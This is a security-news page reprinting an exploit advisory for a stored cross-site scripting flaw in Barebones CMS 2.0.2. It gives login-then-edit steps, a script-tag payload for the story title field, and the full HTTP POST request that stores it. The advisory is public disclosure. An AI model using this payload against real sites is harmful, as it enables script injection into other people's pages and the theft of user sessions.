Security
Headlines
HeadlinesLatestCVEs

Headline

Barebones CMS 2.0.2 Cross Site Scripting

Barebones CMS version 2.0.2 suffers from a persistent cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#linux#js#git#java#php#auth#firefox
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-03# Exploit Author: tmrswrr# Vendor Homepage: https://barebonescms.com/# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip# Version: v2.0.2# Tested : https://demo.barebonescms.com/--- Description ---1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c011843235402) Click edit button and  write your payload in the title field:Payload: "><script>alert(1)</script>3) After save change and will you see alert buttonPOST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1Host: demo.barebonescms.comCookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 237Origin: https://demo.barebonescms.comDnt: 1Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeaction=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution